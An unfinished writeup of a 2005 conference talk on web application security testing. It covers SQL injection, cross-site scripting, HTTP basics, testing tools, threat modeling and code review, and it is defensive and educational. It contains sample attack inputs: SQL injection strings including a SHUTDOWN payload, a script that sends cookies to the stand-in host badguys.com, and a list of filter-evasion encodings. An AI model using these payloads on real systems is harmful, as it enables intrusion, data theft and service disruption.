Web Application Security Testing

This is based on a presentation that I gave at the Minnesota State Colleges and Universities IT Conference in April 2005. I started expanding on my notes but never finished, so it is obviously incomplete toward the end. Also, because it holds fairly close to what I said during that talk and I had a lot to cover in an hour, there's a lot of detail missing. At least I've got handouts. Contact me at sam [at] afongen <dot> com if you have questions.

So you want to test the security of a web application. Let's jump right in and start with penetration tests on a running app, knocking on the front door to see what breaks.

First things first: CYA

Well okay, hold your horses. Before you run anything that smacks of pen-testing, you should do one thing first: cover your ass and get written permission. Seriously. Legalities aside, the techniques and tools covered here have the potential to bring down a server hard. I don't know about you, but I don't like to piss people off and make a lot of extra work unless it's really worth it.

Do yourself a favor and make sure that the right people know what you're doing and that you may inadvertently bring down a production server or leak private data. For that matter, do yourself an even bigger favor and make sure you have a decent testing environment so you don't have to be running tests on a production server in the first place.

SQL Injection

We'll begin with a common vulnerability, SQL injection: modifying an application's input to trick the app into running SQL different from what developers expect to be executed.

Let's say you have a login form like this:

<form action="/login" method="post">
<p><label>Username <input name="uname" type="text" /></label></p>
<p><label>Password <input name="upass" type="password" /></label></p>
<p><input type="submit" value="Login" /></p>
</form>

Once submitted, the application processes the form input to run a query:

SELECT id
FROM users
WHERE uname='$uname'
AND pw=MD5('$upass')

(Note that we're not storing the password as cleartext; we're storing an MD5 hash instead. This helps prevent passwords from being inadvertently leaked.) In a happy day scenario, a legitimate user enters valid credentials:

Taken blindly, the web app uses this input to generate the following SQL:

SELECT id
FROM users
WHERE uname='sam'
AND pw=MD5('J0yful,frum1ous Bandersnatch!')

So far so good. But what if a malicious user entered this for the username: ' OR 1=1; --

SELECT id
FROM users
WHERE uname='' OR 1=1;--'
AND pw=MD5('J0yful,frum1ous Bandersnatch!')

Since '--' signifies the start of a comment, this is effectively what's being run:

SELECT id
FROM users
WHERE uname='' OR 1=1;

Because 1=1 is always true (you mathemeticians in back keep quiet), this query returns all ids.

What happens now could be interesting. Is your app written to handle the possibility of more than one id being returned? Does it log the user in with the first id returned? In that case, a simple SQL injection is enough for an attacker to gain access to your application posing as a legitimate user. Or does it display an error to the user (and therefore the attacker) describing the unexpected result? Or does the app blow up in exciting and unusual ways? Do you know? You should.

Let's take a look at another SQL injection attempt on the same form:

If left unchecked, this creates an interesting query:

SELECT id
FROM users
WHERE uname='';SHUTDOWN;--'
AND pw=MD5('')

If a SHUTDOWN is executed, the results of the first query are unimportant. If a web application is connecting to the database server with sufficient privileges, this could happen. It's been known to happen, in fact, just by using a URL like this:

http://example.com/view.asp?id=3;SHUTDOWN;--

Let's look at one more example, a slightly more involved one to show how an attacker can use SQL injection to map your database structure. Using the same technique as above, you can manipulate the SQL to look like this:

SELECT id
FROM users
WHERE uname='' HAVING 1=1;--'
AND pw=MD5('')

Some database servers don't much care for this, and complain loudly. Unless the web application is prepared to handle the error, the user might just end up seeing something like this:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

Now we know a few key tidbits that might help refine the attack.

  1. This app is using SQL Server. We don't know what version yet, but some more probing can tell us that.
  2. We know a table name and have begun to identify columns in that table. By continuing along the same lines, we can map out the rest of the table. Armed with this knowledge, we're better prepared to alter or read the table's contents.

Lessons

This is just the tip of the iceberg of SQL injection attacks, but already we've learned a few things to keep in mind while developing web applications.

  1. Attackers do unexpected things. You probably have an idealized flow in mind for your application, and expectations for what a user will do. To adequately test your application for security, you'll need to break out of that thinking.
  2. It's important that your code be written to handle unexpected situations. Under no circumstances should it display detailed error messages to end users. No database or application errors, no stack dumps, no messages like "'snowball' is not the correct password for username 'Sam'." Display nothing that tells an attacker any more information than "that didn't work."
  3. The overarching lesson — a very, very important one — is that you should never accept input blindly. Input from outside your application is tainted until proven otherwise.

Of course, SQL-savvy programs like database servers are not the only ones subject to command injection vulnerability. We've got LDAP injection, shell command injection, SOAP injection… Input validation is essential to protecting against all of them.

Filter input, escape output.

When talking about input validation, I like to borrow a phrase from Chris Shiflett, who concisely summarizes a critical technique for improving web application security: filter input, escape output.

Input includes everything in an HTTP request: GET, POST, cookies, HTTP headers … everything. Input may also include what you pull from database or a call to external SOAP service. If it's crossing a trust boundary, if it does not originate within your application code, you need to filter it, validate against expected patterns.

Wait. Back up a minute. Trust boundary?

A key concept in handling data as it passes through your application is boundary filtering: filtering data as it passes between boundaries in a system. For example, there's a boundary between your application and other systems it uses: a database server, a command shell, a mail transfer agent, a SOAP server. Different layers in your application may have boundaries, especially if they're distributed on different servers. There's obviously a trust boundary between your application and its users. Anywhere you might have reason to distrust data as comes to your app, you have a trust boundary and you need to filter the data.

When validating input, please don't try to predict bad input to filter out. You are guaranteed to miss something, trust me. It's far safer to check input against a list of expected patterns, i.e. a whitelist. In the SQL injection example above, we know what usernames look like: in this case, 8 alphanumeric characters. A quick check tells us that ' OR 1=1;-- somehow just isn't right. You should be able to match every bit of input to your application against an expected pattern. If it doesn't look right, reject it. That's why we have regular expressions.

There's another side to boundary filtering, and we've already hinted at it: escaping output. Let's demonstrate with a different sort of vulnerability.

Cross-Site Scripting

If you follow the Bugtraq mailing list for very long, you'll notice a lot of cross-site scripting attacks (XSS). XSS can vary a lot and be subtle and difficult to prevent, but the classic case is straightforward. An attacker posts message that includes JavaScript:

<script>document.location='http://badguys.com/?c=' + document.cookie</script>

The next time someone visits the page with that script embedded, they'll be redirected to badguys.com, their cookie(s) stolen, and possibly returned to the original page none the wiser. It's called cross-site scripting because of this interaction between the attacker's web site and yours, via the victim.

Input validation is an important step in preventing XSS, but it's not foolproof. It is also important to HTML-encode output. Anything from outside your application code must be escaped. Period. Characters that are meaningful in markup (at the very least, < > & ' " ) need to be translated to their equivalent HTML entities (e.g. & becomes &amp;).

Testing for XSS is easy: just enter HTML:

<script>alert('XSS')</script>

and see if it's been escaped in a page that uses that input:

&lt;script&gt;alert('XSS')&lt;/script&gt;

Of course, I lied. It's not that easy. Take a quick glance at this page cataloguing filter evasion techniques and you'll see what I mean. For example, here are different ways to encode the character <:

<
%3C
&lt
&lt;
&LT
&LT;
&#60
&#060
&#0060
&#00060
&#000060
&#0000060
&#60;
&#060;
&#0060;
&#00060;
&#000060;
&#0000060;

&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
&#x3c;
&#x03c;
&#x003c;
&#x0003c;
&#x00003c;
&#x000003c;
&#X3c
&#X03c
&#X003c
&#X0003c
&#X00003c
&#X000003c
&#X3c;
&#X03c;
&#X003c;
&#X0003c;
&#X00003c;
&#X000003c;
&#x3C
&#x03C
&#x003C
&#x0003C
&#x00003C
&#x000003C
&#x3C;
&#x03C;
&#x003C;
&#x0003C;
&#x00003C;
&#x000003C;
&#X3C
&#X03C
&#X003C
&#X0003C
&#X00003C
&#X000003C
&#X3C;
&#X03C;
&#X003C;
&#X0003C;
&#X00003C;
&#X000003C;
\x3c
\x3C
\u003c
\u003C

A bit overwhelming, and I'm sure you'll see how easy it is to miss something.

As I wrote at the outset, XSS can vary dramatically and be quite subtle, which I hope you can now see. It is serious and common vulnerability, though, so it must be tested for.

More on SQL Injection

We talked about the importance of input validation for protecting against SQL injection, but honestly that will only get you so far. Escaping output means more than just HTML-encoding. We should escape any characters that have meaning to external systems to which we're passing data. This is what is meant by boundary filters: Ffilter data as it passes in through a trust boundary, escape data as it passes out through another trust boundary.

For example, in many database servers ' and " are metacharacters and should be escaped. That's how we deal with names like O'Reilly. If we had properly escape input to our login screen above, malicious input like ' OR 1=1; -- would have very different results:

SELECT id
FROM users
WHERE uname='\' OR 1=1;--'
AND pw=MD5('')

Many frameworks and APIs offer functions that handle the escaping for you, so you don't even need to think about it. PHP's mysql_escape_string(), for example (or better yet, mysql_real_escape_string(), which takes into account the character set of the connection).

[insert some more test ranting here]

Tools & Automation

If you're as lazy as I am, right about now you're thinking that this testing is the sort of thing you'll want to automate.

Damn straight.

Before we leap right into the world of automation, though, let's take a quick tour of other tools that can help you manually test for test for input validation.

Manual Form Submission

The first is what we've already been doing: futz with form submission, entering different values in form fields and repeatedly submitting the form. That works well for text fields, but what about checkboxes, radio buttons, hidden fields, and the like? You could use the Mozilla DOM Inspector to alter the form and its contents, but it's usually easier just to save the HTML page to your own hard drive and edit it there. There's nothing to prevent you from submitting the form from a page on your desktop instead of a page that came directly from a web server.

I am frequently surprised by how unexpected this simple technique is for developers. Many have absolutely no idea that it works until I show it to them. But it's true, and it works because of the nature of HTTP.

Learn HTTP

May I just say right now that if you are a web developer, and you're at all concerned about writing secure web applications, it is essential that you understand at least the basics of HTTP. There are plenty of online resources, but if you prefer dead trees I recommend Chris Shiflett's HTTP Developer's Handbook, an introductory and through overview of HTTP. Get to know the common "verbs" like GET and POST and how & why they are used. Understand headers like Host, Referer, User-Agent, Cookie, Set-Cookie, Cache-Control. It is critical that at the very least you understand the mechanics of an HTTP transaction.

One of the most important things to know, and one of the most surprising and least understood among new web developers, is that HTTP is stateless.

Got that? No?

No. I didn't get it the first few times I heard it, either.

"HTTP is stateless" is just a boring way of saying that a web server doesn't remember jack. An HTTP request comes in, the server handles it, the connection is closed and that's it. The next request to come in could come from the same client or could be someone on the other side of the globe. Doesn't matter. The server doesn't care. There is no built-in sense of "oh yeah, I know who this guy is, and this is what's going on during his session." That's up to your application. As far as the web server is concerned, every request is brand-new. That is the beauty and the pain of HTTP.

It's kinda like Dory from the movie Finding Nemo. Dory, you'll recall, has a memory problem: she doesn't often remember something that just happened. Like a web server. Next time you hear "HTTP is stateless," just think of that adorable blue fish.

Back to submitting forms from a desktop. Now you understand why this works: when a web server gets a form submission, it has no way of knowing whether the form is being submitted off a file on your desktop or one that was just sent from the server. It doesn't even care, remember?

"But wait!" you're thinking, "what about the Referer header?" (Ah good, you have been reading up on HTTP.) Application code can test for the Referer header, which a user agent (browser) might send to indicate which page referred it to make this request. The problem is that Referer is easy to fake, is inconsistently sent, and is not to be relied upon: remember, never trust user input. That includes HTTP headers. Yep, they can be altered and faked.

That sounds like a good enough segue to the first tool to help you probe and assess web app security. I'm just going to quickly identify tools here; in the weeks to come I'll write more about how to use them.

LiveHTTPHeaders

LiveHTTPHeaders is a Mozilla extension for monitoring and manipulating HTTP transactions. Fire it up, start browsing, and and it will capture every HTTP header as it whizzes past. It's a good way to learn about HTTP.

[IMAGE]

I use LiveHTTPHeaders every day to review, replay, and modify HTTP transactions. I use it to modify form submissions on the fly, and for manipulating and monitoring cookies. You learn such interesting things looking at cookies. I once reviewed an app delivered by a consultant and within seconds found anadmin=false cookie set in the login process. Sure enough, setting the cookie to admin=true was all I needed to gain full administrative access. Honest to god, 30 seconds with LiveHTTPHeaders and I'd found my first serious security bug.

Note: include security requirements when hiring consultants to write code. It is not safe to assume that they know more about secure coding practices than you do, and unless you identify security asa requirement, there's no reason to expect it to be considered one.

Fiddler

When I first saw Fiddler, I thought it was just LiveHTTPHeaders for Internet Explorer. It does offer a similar ability to view and modify HTTP, but it has a much more detailed view, can do more, and is extensible and programmable. Very nice indeed.

Fiddler integrates seamlessly with IE but can also be set up as HTTP proxy and run with other clients/browsers. I use it for all the same reasons I use LiveHTTPHeaders, plus some. It's especially useful for debugging differences between browsers. If you've got a Windows box, you should be using Fiddler.

WebScarab

Another tool for manually testing a site is WebScarab from OWASP, a cross-platform desktop HTTP proxy. WebScarab is extensible, and can for example be programmed to check for XSS –vulnerabilities. Interestingly, WebScarab also offers the ability to analyze session IDs to discover patterns. If a pattern can be discovered in users' session IDs, then those IDs can be predicted and the sessions hijacked.

The tools I've mentioned so far are good for manual tests. It's important to be able to do manual security tests, if nothing else so you can learn, but there are so many different things to test for (remember the encodings for '<' ?), it would be impossible to test thoroughly by hand. Your kit needs to include tools for automation.

Nikto

Nikto is a Perl script that runs a few thousand tests against a server. Good start, points in a direction for further work.

Nessus

Nessus is a solid network vulnerability scanner. (demo)

Again, get permission!

After Pen-Testing

Let's say your pen-testing reveals serious, widespread design flaws. It happens – maybe not to you, but trust me. Broken access control that's replicated throughout your code, or you find that everywhere you access a database you're vulnerable to SQL injection. Now you've got a ton of code all over the place that needs updating, and a significant investment of time & resources to fix. By this point you're thinking, “Why couldn't I have seen this earlier?"

You can, of course.

SDLC

I take the position that testing isn't just what you do once you've deployed code. Test throughout the development process.

I take this approach because we produce secure software by incorporating security throughout the SDLC -- having a process to design, write, test, and document secure systems, and by building time into the schedule to allow for security review, training, and use of tools. Simply designing, writing, testing, and documenting a project, and then looking for security bugs doesn't create secure software.

This also lets us leverage processes already in place -- or if you don't have an SDLC, thinking about it with security in mind should encourage you to develop one. Which will result in better software.

Start Early. Before Development Begins.

It is to your advantage to consider security as early in the development process as possible, as detecting and addressing bugs early is easier, faster, and cheaper. Before you even begin to think about writing code, you can test to ensure that you're on the right track:

Definition and Design

Security Requirements. Are there any? Until very recently, I had never worked on a project with explicitly defined security requirements. Heck, we're not always fortunate enough to have requirements before we start -- I've certainly had my share of these projects! Here's a situation where considering security early may help bolster your SDLC.

I am not a proponent of hugely detailed requirements documentation. I value documentation, but I value working software more. To that end, I am a fan of just enough documentation to help get the job done. Fit the docs to your project.

Misuse Cases.

On my team, we use use cases to help elucidate requirements. We tend to work on large projects that merit this approach. Use cases are a user-friendly, little-fuss way to ID what an app should do.

[ insert diagram ]

Use cases talk about what a system should do. Misuse cases identify what a system should not do.

[ insert example ]

By considering misuse cases, we've expanded our use case model and get better design to boot.

Misuse cases also help use build up test cases for use later, in code review and penetration testing.

Early design consideration helps identify inconsistencies, repetition (multiple authentication schemes? repeated code? consolidate! validation framework? consolidate!)

Threat Models.

If I thought I could get away with turning this into an hour-long talk about threat modeling, I would. It's really cool. An entire chapter of the excellent Threats and Countermeasures, and also of the phenomenal book Writing Secure Code, are dedicated to threat modeling. Why? Threat models are an effective, systematic technique for identifying threats to a system.

Why? You cannot write secure software until you understand threats against it. Period.

A threat model process looks something like this:

  1. Identify Assets
  2. Create architecture overview
  3. Decompose application
  4. Identify Threats
  5. Document Threats
  6. Rate threats.

Depending on how much time II have here, I might get into more detail on this. But more likely, I'll focus on:

STRIDE is one of those things I thought was ridiculously hokey when I first encountered it, but I've come to think it's a good approach.

This is where you need to have a handle on at least the OWASP Top Ten. Once you've mastered that, move on to the OWASP Guide and Microsoft's Threats and Countermeasures, both of which have detailed discussion of common vulnerabilities. You cannot protect effectively against threats you don't know about or understand. And we tend to find and know how to look for bugs we know about -- it is to your advantage, therefore, to know about as many as you can.

You may find it helpful to develop attack trees, methodically identifying the steps an attacker must take to be successful

[DIAGRAM]

I also sometimes like to work with attack patterns, which describe techniques used in an attack.

[ example ]

Both have their merits, both also carry risk of carrying you too far into documentation and analysis paralysis -- when analysis ends only when the project is cancelled without producing a line of code. :) Both can be reused, though, so over time you'll build up a collection.

The idea is to document threats to help you prepare countermeasures. When coding, then, you can take these documented threats and employ countermeasures -- and use the threat docs as something to use in later stages of testing.

The other acronym in threat modeling is DREAD. I still think it is hokey, is a good way to help rate threats. Because face it: there's no such thing as perfect security. There will be vulnerabilities in your software. It is important to know about them -- and document that you know -- but if it is a very low risk, it might not be worth your time to trying to fix. Spend a dollar to save a dime.

It's important to note that risk assessment may change over time and on different apps.

This is also an opportunity to set up for defense in depth: multiple layers of defense so that there is no single catastrophic point of failure.

DURING DEVELOPMENT

Here's the fun bit: coding.

There are a number of things you can do during development. Obviously, if you've been creating misuse cases and threat models, keeping those on hand and taking specific steps to address threats is a Good Idea.

Code reviews are great. We do weekly code reviews on our team, grabbing another developer or two to look over what we've done. It's had a positive effect on our code quality.

With security in mind, use checklists:

* from your security & business requirements

* OWASP Top Ten & Guide

* language/platform-specific guides (PHP Security Consortium, J2EE, .NET)

This might seem time consuming, and if you're on a small team it may be difficult, but do it if you can. And some bugs will be faster to find in a code review than in pen-testing – 50 SQL injection bugs, but in code only once.

There are also tools to automate static code checking. Most are for C, C++, C#, Java, but there are also some out there for PHP & such. If you are a .NET developer, you should be using FxCop. I'm not, so I can't speak personally to it, but People In The Know are, so...

Again, one of the most effective things you can do to improve the security of your code is not to trust input.

Filter input.

Escape output.

Follow BugTraq awhile and you'll see why.

DEPLOYMENT

This is probably what you thought you'd be getting when you sat down in this room: testing an actual running application for security holes -- and hoping you don't find them.

But I hope you understand by now that there's a lot you can do before you reach this stage to help improve the security of your code. This important because to fix a bug now -- security-related or otherwise -- is going to be harder, more error-prone, and take longer. On the other hand I'm also a strong believer in iterative development, and I understand that you'll be going back and forth between coding and design a lot.

It's also important to know that pen-testing -- trying to break an app -- will not find certain classes of bugs. And just because you couldn't find a problem doesn't mean it isn't there.

"If you fail a penetration test you know you have a very bad problem indeed. If you pass a penetration test you do not know that you don't have a very bad problem."

That said, pen-testing still is a valuable tool as a part of the process. It is worth doing manually, poking, prodding, testing the boundaries of a system, if nothing else because it will help you expand your understanding of the sorts of vulnerabilities out there. Again, checklists are useful. But keep them current.

[ demo SQL injection or XSS ]

MAINTENANCE

Logging. Log relevant things.

Incident Response.